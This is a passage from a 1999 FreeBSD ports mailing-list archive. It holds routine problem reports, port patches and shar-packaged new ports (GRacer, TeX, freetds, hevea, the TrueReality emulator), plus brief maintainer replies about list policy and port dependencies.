AC_CHECK_LIB(ungif, DGifOpenFileHandle, -- GIF_LIBS="-lungif" -+ GIF_LIBS="-lungif", - AC_CHECK_LIB(gif, DGifOpenFileHandle, - GIF_LIBS="-lgif", - AC_MSG_ERROR([GIF library file not found]), -- $GX_LIBS), -- $GX_LIBS), -+ $x_suffix), -+ $x_suffix), - AC_MSG_ERROR([GIF header not found])) - - AC_SUBST(JPEG_LIBS) Index: pkg/COMMENT =================================================================== RCS file: /home/cvs/cvs/ports/games/gracer/pkg/COMMENT,v retrieving revision 1.1.1.1 diff -u -u -r1.1.1.1 COMMENT --- COMMENT 1999/09/28 02:57:19 1.1.1.1 +++ COMMENT 1999/11/28 13:19:06 @@ -1 +1 @@ -A 3D motor sports simulator +A 3D motor sport simulator Index: pkg/DESCR =================================================================== RCS file: /home/cvs/cvs/ports/games/gracer/pkg/DESCR,v retrieving revision 1.1.1.1 diff -u -u -r1.1.1.1 DESCR --- DESCR 1999/09/28 02:57:19 1.1.1.1 +++ DESCR 1999/11/27 21:21:05 @@ -1,14 +1,11 @@ -GRacer is a 3D motor sports simulator. It's state of the art physical +GRacer is a 3D motor sport simulator. It's state of the art physical simulation engine creates realistic behavior including drift, wheel spin, and even accel turn. -This release includes 2 type of vehicles: Formula Car (FR) and -Rally Car (4WD). It will support GP500 motorcycle near future. - Current Feature --------------- - - 2 vehicles and one course - - game is playable, but never finish + - 4 vehicles and one course + - game is playable ( network play is not implemented in this release ) Index: pkg/PLIST =================================================================== RCS file: /home/cvs/cvs/ports/games/gracer/pkg/PLIST,v retrieving revision 1.1.1.1 diff -u -u -r1.1.1.1 PLIST --- PLIST 1999/09/28 02:57:19 1.1.1.1 +++ PLIST 1999/11/27 21:13:48 @@ -1,6 +1,12 @@ bin/gracer share/gracer/courses/course1.grc share/gracer/courses/course1.grs +share/gracer/courses/course2.grc +share/gracer/courses/course2.grs +share/gracer/courses/course3.grc +share/gracer/courses/course3.grs +share/gracer/courses/course4.grc +share/gracer/courses/course4.grs share/gracer/courses/grass.jpg share/gracer/courses/road.jpg share/gracer/license @@ -11,16 +17,32 @@ share/gracer/scripts/cache.tcl share/gracer/scripts/glut.tcl share/gracer/scripts/gr.tcl +share/gracer/scripts/hiscore.tcl share/gracer/scripts/init.tcl -share/gracer/scripts/init.tcl.in +share/gracer/scripts/postinit.tcl +share/gracer/scripts/timestamp.tcl share/gracer/scripts/ui.tcl -share/gracer/scripts/ui.tcl.in +share/gracer/sounds/exhaust.au +share/gracer/sounds/slip.au +share/gracer/vehicles/cart.grv +share/gracer/vehicles/cart/cart.grs +share/gracer/vehicles/cart/engine.dat +share/gracer/vehicles/cart/fbmu.dat +share/gracer/vehicles/cart/ftire.dat +share/gracer/vehicles/cart/rtire.dat share/gracer/vehicles/formula.grv share/gracer/vehicles/formula/engine.dat share/gracer/vehicles/formula/fbmu.dat share/gracer/vehicles/formula/formula.grs share/gracer/vehicles/formula/ftire.dat share/gracer/vehicles/formula/rtire.dat +share/gracer/vehicles/mini.grv +share/gracer/vehicles/mini/engine.dat +share/gracer/vehicles/mini/fbmu.dat +share/gracer/vehicles/mini/ftire.dat +share/gracer/vehicles/mini/mini.grs +share/gracer/vehicles/mini/rtire.dat +share/gracer/vehicles/mini/sbmu.dat share/gracer/vehicles/road.grv share/gracer/vehicles/road/engine.dat share/gracer/vehicles/road/fbmu.dat @@ -28,10 +50,21 @@ share/gracer/vehicles/road/road.grs share/gracer/vehicles/road/rtire.dat share/gracer/vehicles/road/sbmu.dat +share/gracer/vehicles/s2000.grv +share/gracer/vehicles/s2000/engine.dat +share/gracer/vehicles/s2000/fbmu.dat +share/gracer/vehicles/s2000/ftire.dat +share/gracer/vehicles/s2000/rtire.dat +share/gracer/vehicles/s2000/s2000.grs +share/gracer/vehicles/s2000/sbmu.dat @dirrm share/gracer/courses @dirrm share/gracer/scenes @dirrm share/gracer/scripts +@dirrm share/gracer/sounds +@dirrm share/gracer/vehicles/cart @dirrm share/gracer/vehicles/formula +@dirrm share/gracer/vehicles/mini @dirrm share/gracer/vehicles/road +@dirrm share/gracer/vehicles/s2000 @dirrm share/gracer/vehicles @dirrm share/gracer --- /dev/null Sun Nov 28 14:32:12 1999 +++ patches/patch-ab Sun Nov 28 14:32:01 1999 @@ -0,0 +1,23 @@ +Index: src/sound.cxx +@@ -30,6 +30,21 @@ + int Sound_Init (Tcl_Interp *interp) + { + sched = new slScheduler (8000); ++ /* ++ * check for sound working, otherwise we get a segfault in ++ * sched->addSampleEnvelope below if /dev/dsp is not configured ++ */ ++ if (sched->not_working()) { ++#if 0 ++ /* XXX this gets a few ++ * `gracer in free(): warning: junk pointer, too high to make sense.' ++ * don't ask me why. So we'll just leak memory, it should only ++ * be allocated once per process... ++ */ ++ delete sched; ++#endif ++ sched = NULL; ++ } + if (sched) { + sched->setSafetyMargin (0.2); + } >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sun Nov 28 6:50: 3 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 98FC614C10 for ; Sun, 28 Nov 1999 06:50:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id GAA26038; Sun, 28 Nov 1999 06:50:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id 2B9D314BD8; Sun, 28 Nov 1999 06:41:32 -0800 (PST) Message-Id: <19991128144132.2B9D314BD8@hub.freebsd.org> Date: Sun, 28 Nov 1999 06:41:32 -0800 (PST) From: lioux@linf.unb.br To: freebsd-gnats-submit@freebsd.org X-Send-Pr-Version: www-1.0 Subject: ports/15142: Added DIST_SUBDIR to print/tex port Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15142 >Category: ports >Synopsis: Added DIST_SUBDIR to print/tex port >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Sun Nov 28 06:50:00 PST 1999 >Closed-Date: >Last-Modified: >Originator: Mario Sergio Fujikawa Ferreira >Release: >Organization: >Environment: >Description: A DIST_SUBDIR should be added to the print/tex port according to the handbook port guidelines. >How-To-Repeat: >Fix: --- Makefile.ORIG Sun Nov 28 12:31:28 1999 +++ Makefile Sun Nov 28 12:31:40 1999 @@ -19,6 +19,8 @@ EXTRACT_ONLY= web2c-7.1.tar.gz web-7.1.tar.gz tex_base.tar.gz cm_tfm.tar.gz \ mf_lib.tar.gz cm_mf.tar.gz +DIST_SUBDIR= tex + USE_GMAKE= yes MAKE_FLAGS= fmts= all_mems= >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sun Nov 28 8:30: 7 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 9AEE414BED for ; Sun, 28 Nov 1999 08:30:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id IAA35028; Sun, 28 Nov 1999 08:30:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from mx.nkm.lt (mx.nkm.lt [193.219.211.9]) by hub.freebsd.org (Postfix) with SMTP id 2218014D4C for ; Sun, 28 Nov 1999 08:23:24 -0800 (PST) (envelope-from midom@mx.nkm.lt) Received: (qmail 4766 invoked by uid 1073); 28 Nov 1999 16:23:20 -0000 Message-Id: <19991128162320.4765.qmail@mx.nkm.lt> Date: 28 Nov 1999 16:23:20 -0000 From: Domas Mituzas To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: ports/15143: update to freetds port (new release) Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15143 >Category: ports >Synopsis: update to freetds port (new release) >Confidential: no >Severity: non-critical >Priority: medium >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Sun Nov 28 08:30:00 PST 1999 >Closed-Date: >Last-Modified: >Originator: Domas Mituzas >Release: FreeBSD 2.2.8-STABLE i386 >Organization: Duomenu bazes ir technologijos >Environment: FreeBSD mx.nkm.lt 2.2.8-STABLE FreeBSD 2.2.8-STABLE #0: Sun Sep 5 16:38:14 CEST 1999 root@mx.nkm.lt:/usr/src/sys/compile/NKM i386 >Description: >How-To-Repeat: Apply the patch below >Fix: diff -ur freetds.old/Makefile freetds/Makefile --- freetds.old/Makefile Sun Nov 28 16:50:43 1999 +++ freetds/Makefile Sun Nov 28 18:06:03 1999 @@ -1,12 +1,11 @@ # New ports collection makefile for: freetds -# Version required: 0.47pre2 +# Version required: 0.47 # Date created: 02 Nov 1999 # Whom: Domas Mituzas # # $FreeBSD: ports/databases/freetds/Makefile,v 1.1.1.1 1999/11/26 20:52:38 steve Exp $ -DISTNAME= freetds-0.47pre2 -PKGNAME= freetds-0.47p2 +DISTNAME= freetds-0.47 CATEGORIES= databases MASTER_SITES= ${MASTER_SITE_SUNSITE} MASTER_SITE_SUBDIR= ALPHA/freetds diff -ur freetds.old/files/md5 freetds/files/md5 --- freetds.old/files/md5 Sun Nov 28 16:50:42 1999 +++ freetds/files/md5 Sun Nov 28 17:03:16 1999 @@ -1 +1 @@ -MD5 (freetds-0.47pre2.tgz) = b7e36074bf1f0e2dfbb53b1eebc9c6f0 +MD5 (freetds-0.47.tgz) = b7e36074bf1f0e2dfbb53b1eebc9c6f0 diff -ur freetds.old/pkg/PLIST freetds/pkg/PLIST --- freetds.old/pkg/PLIST Sun Nov 28 16:50:42 1999 +++ freetds/pkg/PLIST Sun Nov 28 18:07:19 1999 @@ -1,25 +1,25 @@ -include/bkpublic.h +lib/libtds.so.0.0 +lib/libtds.la +lib/libtds.a +lib/libct.so.0.0 +lib/libct.la +lib/libct.a +lib/libsybdb.so.0.0 +lib/libsybdb.la +lib/libsybdb.a include/cspublic.h -include/cstypes.h include/ctpublic.h +include/sybdb.h +include/sybfront.h +include/tdsutil.h +include/bkpublic.h +include/cstypes.h include/dblib.h +include/syberror.h include/sqldb.h include/sqlfront.h -include/sybdb.h -include/syberror.h -include/sybfront.h include/tds.h -include/tdsutil.h include/tdsver.h interfaces -lib/libct.a -lib/libct.la -lib/libct.so.0 -lib/libsybdb.a -lib/libsybdb.la -lib/libsybdb.so.0 -lib/libtds.a -lib/libtds.la -lib/libtds.so.0 @exec /usr/bin/env OBJFORMAT=%%PORTOBJFORMAT%% /sbin/ldconfig -m %B @unexec /usr/bin/env OBJFORMAT=%%PORTOBJFORMAT%% /sbin/ldconfig -R >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sun Nov 28 9:29:30 1999 Delivered-To: freebsd-ports@freebsd.org Received: from merkur.hrz.uni-giessen.de (merkur.hrz.uni-giessen.de [134.176.2.12]) by hub.freebsd.org (Postfix) with ESMTP id 6E091155AC for ; Sun, 28 Nov 1999 09:29:27 -0800 (PST) (envelope-from Ariel.Burbaickij@mni.fh-giessen.de) Received: from caspar.mni.fh-giessen.de by merkur.hrz.uni-giessen.de with ESMTP for freebsd-ports@freebsd.org; Sun, 28 Nov 1999 18:29:22 +0100 Received: from sun33.mni.fh-giessen.de ([134.176.183.133]) by caspar.mni.fh-giessen.de with esmtp (Exim 2.12 #6) id 11s7y3-0005tm-00 for freebsd-ports@FreeBSD.org; Sun, 28 Nov 1999 18:18:31 +0100 Received: from localhost (hg9456@localhost) by sun33.mni.fh-giessen.de (8.9.3+Sun/8.8.8) with ESMTP id SAA00045 for ; Sun, 28 Nov 1999 18:29:15 +0100 (MET) X-Authentication-Warning: sun33.mni.fh-giessen.de: hg9456 owned process doing -bs Date: Sun, 28 Nov 1999 18:29:14 +0100 (MET) From: Ariel Burbaickij X-Sender: hg9456@sun33 To: freebsd-ports@FreeBSD.ORG Subject: dare to repost Message-Id: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I posted this message already but it come out that i wa not in the list. Well ,once more what are the policies accepted int th list. Some DO and DONTS and I probably most important:Will the questions related to troubles using ports be tolerated? kind regards, Ariel To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sun Nov 28 10:30: 4 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id A75DC15345 for ; Sun, 28 Nov 1999 10:30:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id KAA48128; Sun, 28 Nov 1999 10:30:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from cauchy.math.missouri.edu (cauchy.math.missouri.edu [128.206.72.27]) by hub.freebsd.org (Postfix) with ESMTP id 37FE8150DD for ; Sun, 28 Nov 1999 10:23:36 -0800 (PST) (envelope-from stephen@cauchy.math.missouri.edu) Received: (from stephen@localhost) by cauchy.math.missouri.edu (8.9.3/8.9.1) id MAA41027; Sun, 28 Nov 1999 12:23:11 -0600 (CST) Message-Id: <199911281823.MAA41027@cauchy.math.missouri.edu> Date: Sun, 28 Nov 1999 12:23:11 -0600 (CST) From: stephen@math.missouri.edu Reply-To: stephen@math.missouri.edu To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: ports/15144: New port for hevea Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15144 >Category: ports >Synopsis: New port for hevea >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Sun Nov 28 10:30:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: Stephen Montgomery-Smith >Release: FreeBSD 3.3-STABLE i386 >Organization: University of Missouri >Environment: >Description: >How-To-Repeat: >Fix: # This is a shell archive. Save it in a file, remove anything before # this line, and then unpack it by entering "sh file". Note, it may # create directories; files and directories will be owned by you and # have default permissions. # # This archive contains: # # hevea # hevea/files # hevea/files/md5 # hevea/patches # hevea/pkg # hevea/pkg/COMMENT # hevea/pkg/DESCR # hevea/pkg/PLIST # hevea/Makefile # echo c - hevea mkdir -p hevea > /dev/null 2>&1 echo c - hevea/files mkdir -p hevea/files > /dev/null 2>&1 echo x - hevea/files/md5 sed 's/^X//' >hevea/files/md5 << 'END-of-hevea/files/md5' XMD5 (hevea-1.04.tar.gz) = 5edef230164614a9909d3613e5248ea9 END-of-hevea/files/md5 echo c - hevea/patches mkdir -p hevea/patches > /dev/null 2>&1 echo c - hevea/pkg mkdir -p hevea/pkg > /dev/null 2>&1 echo x - hevea/pkg/COMMENT sed 's/^X//' >hevea/pkg/COMMENT << 'END-of-hevea/pkg/COMMENT' XConvert LaTeX to HTML END-of-hevea/pkg/COMMENT echo x - hevea/pkg/DESCR sed 's/^X//' >hevea/pkg/DESCR << 'END-of-hevea/pkg/DESCR' XHEVEA is a quite complete and fast LATEX to HTML translator. X XWWW: http://para.inria.fr/~maranget/hevea/ X XStephen Montgomery-Smith Xstephen@math.missouri.edu END-of-hevea/pkg/DESCR echo x - hevea/pkg/PLIST sed 's/^X//' >hevea/pkg/PLIST << 'END-of-hevea/pkg/PLIST' Xbin/hevea Xbin/hacha Xbin/imagen Xlib/hevea/contents_motif.gif Xlib/hevea/cutfoot-eng.html Xlib/hevea/cutfoot-fra.html Xlib/hevea/footer.tex Xlib/hevea/hevea.sty Xlib/hevea/next_motif.gif Xlib/hevea/previous_motif.gif Xlib/hevea/html/ams.hva Xlib/hevea/html/article.hva Xlib/hevea/html/book.hva Xlib/hevea/html/hevea.hva Xlib/hevea/html/mathaccents.hva Xlib/hevea/html/multind.hva Xlib/hevea/html/report.hva Xlib/hevea/html/seminar.hva Xlib/hevea/html/symb-eng.hva Xlib/hevea/html/symb-fra.hva Xlib/hevea/html/symb-mathml.hva Xlib/hevea/html/symb-text.hva Xlib/hevea/html/symb.hva Xlib/hevea/info/article.hva Xlib/hevea/info/book.hva Xlib/hevea/info/hevea.hva Xlib/hevea/info/report.hva Xlib/hevea/info/seminar.hva Xlib/hevea/text/article.hva Xlib/hevea/text/book.hva Xlib/hevea/text/hevea.hva Xlib/hevea/text/report.hva Xlib/hevea/text/seminar.hva Xlib/hevea/text/symb.hva Xshare/texmf/tex/latex/hevea/hevea.sty X@dirrm lib/hevea/html X@dirrm lib/hevea/info X@dirrm lib/hevea/text X@dirrm lib/hevea X@dirrm share/texmf/tex/latex/hevea END-of-hevea/pkg/PLIST echo x - hevea/Makefile sed 's/^X//' >hevea/Makefile << 'END-of-hevea/Makefile' X# New ports collection makefile for: hevea X# Version required: 1.0.4 X# Date created: Novemeber 28 1999 X# Whom: Stephen Montgomery-Smith X# X# $FreeBSD$ X# X XDISTNAME= hevea-1.04 XCATEGORIES= textproc XMASTER_SITES= ftp://ftp.inria.fr/INRIA/Projects/para/hevea/ X XMAINTAINER= stephen@math.missouri.edu X XBUILD_DEPENDS= ocamlc:${PORTSDIR}/lang/ocaml X X.include X XTEX_DIR= ${PREFIX}/share/texmf/tex/latex XTEXHASH= ${PREFIX}/bin/texhash X Xpost-install: X strip ${PREFIX}/bin/hevea X strip ${PREFIX}/bin/hacha X# This is a hack to get hevea.sty put in a place where latex X# will find it. If you have a better way to do this, please X# tell me about it. X.if exists(${TEX_DIR}) X ${MKDIR} ${TEX_DIR}/hevea X ${CP} ${PREFIX}/lib/hevea/hevea.sty ${TEX_DIR}/hevea/hevea.sty X.if exists(${TEXHASH}) X ${TEXHASH} X.endif X.endif X X.include END-of-hevea/Makefile exit >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sun Nov 28 10:40:56 1999 Delivered-To: freebsd-ports@freebsd.org Received: from mail.HiWAAY.net (fly.HiWAAY.net [208.147.154.56]) by hub.freebsd.org (Postfix) with ESMTP id B053814BE4 for ; Sun, 28 Nov 1999 10:40:51 -0800 (PST) (envelope-from sprice@hiwaay.net) Received: from localhost (sprice@localhost) by mail.HiWAAY.net (8.9.3/8.9.0) with ESMTP id MAA11552; Sun, 28 Nov 1999 12:40:48 -0600 (CST) Date: Sun, 28 Nov 1999 12:40:48 -0600 (CST) From: Steve Price To: Stephen Montgomery-Smith Cc: freebsd-ports@FreeBSD.ORG Subject: Re: Help making port for hevea In-Reply-To: <3840E8E4.988BE41A@math.missouri.edu> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sun, 28 Nov 1999, Stephen Montgomery-Smith wrote: # .include # # TEX_DIR= ${PREFIX}/share/texmf/tex/latex # # post-install: # .if exists(${TEX_DIR}) # ${MKDIR} ${TEX_DIR}/hevea # ${CP} ${PREFIX}/lib/hevea/hevea.sty ${TEX_DIR}/hevea/hevea.sty # texhash # .endif # # Well this doesn't seem very portable to me. I mean, suppose that the # teTeX port radically changes it directory structure? Or suppose the # person is using the latex port instead of the teTeX port? Or suppose the directory is there and texhash is not? :) The *tex ports have a tendency to leave directory droppings all over the place. How about something like this? post-install: .if exists$(${TEX_DIR}) ${CAT} ${PKGDIR}/MESSAGE .endif And in pkg/MESSAGE you explain that the user looks to have *tex installed and they might like to copy hevea.sty to a location where it could be used. -steve To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sun Nov 28 10:43:24 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 7759014BE4; Sun, 28 Nov 1999 10:43:23 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id KAA50620; Sun, 28 Nov 1999 10:43:23 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Sun, 28 Nov 1999 10:43:23 -0800 (PST) From: Message-Id: <199911281843.KAA50620@freefall.freebsd.org> To: andrews@technologist.com, steve@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15132: new port: games/krubik Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: new port: games/krubik State-Changed-From-To: open->closed State-Changed-By: steve State-Changed-When: Sun Nov 28 10:42:53 PST 1999 State-Changed-Why: This port was imported yesterday. :) Thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sun Nov 28 10:56: 9 1999 Delivered-To: freebsd-ports@freebsd.org Received: from mail.HiWAAY.net (fly.HiWAAY.net [208.147.154.56]) by hub.freebsd.org (Postfix) with ESMTP id 4ADB9150B0 for ; Sun, 28 Nov 1999 10:56:08 -0800 (PST) (envelope-from sprice@hiwaay.net) Received: from localhost (sprice@localhost) by mail.HiWAAY.net (8.9.3/8.9.0) with ESMTP id MAA09886; Sun, 28 Nov 1999 12:56:05 -0600 (CST) Date: Sun, 28 Nov 1999 12:56:05 -0600 (CST) From: Steve Price To: Ariel Burbaickij Cc: freebsd-ports@FreeBSD.ORG Subject: Re: policies accepted in the list and questions you deal with In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sun, 28 Nov 1999, Ariel Burbaickij wrote: # Hallo, # I am new to this list would like to get some information about # DO and DONTS here as well as about format you expect from # any user experiencing some troubles with ported applications # and wishing to send his reports to this list(in case they are # accpted at all). # kind regards, # Ariel Burbaickij Questions about ports should be directed to this list. Problems and hopefully fixes for them you should become GNATS problem reports. Sending problem reports and patches to this list means there's a good chance they will get missed. Putting them in GNATS means at least your report will be saved. Doesn't guarantee that is will be resolved any faster though. :/ -steve To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sun Nov 28 11:40: 2 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 24300152CA for ; Sun, 28 Nov 1999 11:40:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id LAA54869; Sun, 28 Nov 1999 11:40:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id 04340152F9; Sun, 28 Nov 1999 11:35:32 -0800 (PST) Message-Id: <19991128193532.04340152F9@hub.freebsd.org> Date: Sun, 28 Nov 1999 11:35:32 -0800 (PST) From: lioux@linf.unb.br To: freebsd-gnats-submit@freebsd.org X-Send-Pr-Version: www-1.0 Subject: ports/15145: emulator/vgb port with incomplete PLIST Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15145 >Category: ports >Synopsis: emulator/vgb port with incomplete PLIST >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Sun Nov 28 11:40:00 PST 1999 >Closed-Date: >Last-Modified: >Originator: Mario Sergio Fujikawa Ferreira >Release: >Organization: >Environment: >Description: emulator/vgb creates some directories inside Makefile but does not erase them. I am supplying an updated PLIST. >How-To-Repeat: >Fix: --- pkg/PLIST.ORIG Sun Nov 28 17:30:24 1999 +++ pkg/PLIST Sun Nov 28 17:30:00 1999 @@ -2,3 +2,5 @@ bin/gblist libexec/VGB/vgb share/VGB/CART.GB +@dirrm libexec/VGB +@dirrm share/VGB >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sun Nov 28 11:50:37 1999 Delivered-To: freebsd-ports@freebsd.org Received: from web2.sea.nwserv.com (web2.sea.nwserv.com [216.145.16.2]) by hub.freebsd.org (Postfix) with ESMTP id 534F714C02 for ; Sun, 28 Nov 1999 11:50:36 -0800 (PST) (envelope-from dpk@nwserv.com) Received: from localhost (dpk@localhost) by web2.sea.nwserv.com (8.9.3/8.9.3) with ESMTP id LAA20065 for ; Sun, 28 Nov 1999 11:50:36 -0800 (PST) (envelope-from dpk@nwserv.com) Date: Sun, 28 Nov 1999 11:50:36 -0800 (PST) From: David Kirchner X-Sender: dpk@web2.sea.nwserv.com To: ports@FreeBSD.ORG Subject: Buggy dependencies - zope Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The zope port depends on Apache + SSL, which I had installed, but it was installed through the apache+modphp3 port, so zope decided it was cool to go ahead and install the apache+modssl port, without php3 support. I'd suggest changing the dependency to the apache binary, instead of the installed port. - dpk, regenerating the apache.conf file overwritten by reinstalling apache+modphp3. zope isn't worth this. heh. -- David Kirchner, dpk@nwserv.com Northwest Web Services, Kirkland Washington 1-877-5-NWSERV - http://www.nwserv.com/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sun Nov 28 12: 0: 5 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id CD7E214CA0 for ; Sun, 28 Nov 1999 12:00:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id MAA56171; Sun, 28 Nov 1999 12:00:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id 1382B14C02; Sun, 28 Nov 1999 11:52:59 -0800 (PST) Message-Id: <19991128195259.1382B14C02@hub.freebsd.org> Date: Sun, 28 Nov 1999 11:52:59 -0800 (PST) From: lioux@linf.unb.br To: freebsd-gnats-submit@freebsd.org X-Send-Pr-Version: www-1.0 Subject: ports/15146: New port submition emulator/truereality, the TrueReality (TR) N64 emulator Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15146 >Category: ports >Synopsis: New port submition emulator/truereality, the TrueReality (TR) N64 emulator >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Sun Nov 28 12:00:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: Mario Sergio Fujikawa Ferreira >Release: >Organization: >Environment: >Description: emulator/truereality port of N64 emulator TrueReality(TM) designed as a developer's tool >How-To-Repeat: >Fix: # This is a shell archive. Save it in a file, remove anything before # this line, and then unpack it by entering "sh file". Note, it may # create directories; files and directories will be owned by you and # have default permissions. # # This archive contains: # # truereality # truereality/files # truereality/files/md5 # truereality/patches # truereality/patches/patch-aa # truereality/patches/patch-ab # truereality/patches/patch-ac # truereality/pkg # truereality/pkg/COMMENT # truereality/pkg/DESCR # truereality/pkg/PLIST # truereality/Makefile # echo c - truereality mkdir -p truereality > /dev/null 2>&1 echo c - truereality/files mkdir -p truereality/files > /dev/null 2>&1 echo x - truereality/files/md5 sed 's/^X//' >truereality/files/md5 << 'END-of-truereality/files/md5' XMD5 (TrueReality-1999062900.tgz) = 59ba6cb9c4cc709a6361363fe234a103 END-of-truereality/files/md5 echo c - truereality/patches mkdir -p truereality/patches > /dev/null 2>&1 echo x - truereality/patches/patch-aa sed 's/^X//' >truereality/patches/patch-aa << 'END-of-truereality/patches/patch-aa' X--- Makefile.tmpl.ORIG Sat Nov 27 22:21:16 1999 X+++ Makefile.tmpl Sun Nov 28 15:40:17 1999 X@@ -39,8 +39,8 @@ X ############################################################################### X X # it might be that you need gmake (in my distribution make is a link to gmake) X-MAKE = make X-#MAKE = gmake X+#MAKE = make X+MAKE = gmake X #MAKE = /usr/local/bin/gmake X X X@@ -60,7 +60,8 @@ X HOSTCFLAGS = X #HOSTCFLAGS = -ansi -pedantic X X-HOSTCPP = $(HOSTCC) -E X+HOSTCPP = $(CXX) X+#HOSTCPP = $(HOSTCC) -E X #HOSTCPP = cpp X X #HOSTLD = ld X@@ -188,8 +189,8 @@ X # # X ############################################################################### X X-ARCH = linux X-#ARCH = bsd X+#ARCH = linux X+ARCH = bsd X #ARCH = sunos X #ARCH = solaris X #ARCH = aix END-of-truereality/patches/patch-aa echo x - truereality/patches/patch-ab sed 's/^X//' >truereality/patches/patch-ab << 'END-of-truereality/patches/patch-ab' X--- Makefile.ORIG Sat Nov 27 23:06:31 1999 X+++ Makefile Sun Nov 28 15:18:03 1999 X@@ -354,6 +354,9 @@ X ifeq ($(ARCH),os2) X 